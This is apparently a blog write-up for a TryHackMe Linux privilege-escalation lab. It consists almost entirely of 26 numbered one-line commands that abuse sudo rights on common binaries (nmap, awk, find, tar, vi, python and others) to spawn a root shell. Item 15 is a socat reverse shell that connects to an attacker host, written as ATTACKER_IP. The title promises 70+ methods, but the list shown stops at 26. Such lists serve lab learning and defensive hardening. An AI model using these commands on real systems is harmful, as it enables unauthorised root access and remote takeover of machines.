Member-only story
70+ WAYS TO GET ROOT — LINUX PRIVILEGE ESCALATION
This write-up is for getting the root shell on Linux and is based on the Linux Privesc Playground room on https://tryhackme.com/
Login to the box using the :- SSH Credentials given — check the room’s details on THM
Here is the list of all the ways which I could have think of at the time of solving this:
1. nmap --interactive; !sh
2. echo “os.execute(‘/bin/sh’)” > shell.nse && sudo nmap --script=shell.nse
3. sudo awk ‘BEGIN {system(“/bin/sh”)}’
4. sudo find /home -exec /bin/bash \;
5. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
6. sudo less /etc/hosts then !/bin/bash
7. sudo bash
8. sudo perl -e ‘exec “/bin/bash”;’
9. sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
10. sudo man man
!/bin/bash
11. sudo vi
:!/bin/bash
12. sudo vim -c ‘!sh’
13. sudo env /bin/bash
14. sudo ftp
!/bin/bash
15. On Attacker Machine run:
socat file:`tty`,raw,echo=0 tcp-listen:1234
then on Target Machine run:
sudo socat exec:’sh -li’,pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:1234
16. sudo /bin/bash -p
17. sudo -s
18. sudo php -r “system(‘/bin/sh’);”
19. sudo strace -o /dev/null /bin/sh
20. sudo xargs -a /dev/null sh
21. sudo timeout --foreground 7d /bin/sh
22. sudo expect -c ‘spawn /bin/sh;interact’
23. sudo ionice /bin/sh
24. sudo /usr/bin/time /bin/sh
25. sudo taskset 1 /bin/sh
26. sudo flock -u / /bin/sh
